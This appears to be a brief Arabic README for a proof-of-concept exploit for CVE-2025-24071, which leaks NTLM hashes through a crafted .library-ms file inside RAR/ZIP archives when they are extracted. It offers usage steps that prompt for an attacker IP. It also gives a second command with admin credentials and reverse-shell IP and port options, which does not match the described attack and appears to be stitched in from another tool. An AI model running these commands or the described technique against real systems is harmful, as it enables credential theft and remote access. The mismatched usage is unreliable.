
إثبات مفهوم لـ CVE-2025-24071، يوضح تسرب تجزئة NTLM عبر ملف .library-ms مصمم في أرشيفات RAR/ZIP، مما يؤدي إلى تشغيل مصادقة SMB عند الاستخراج.
CVE-2025-24071: تسرب تجزئة NTLM عبر استخراج RAR/ZIP وملف .library-ms
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888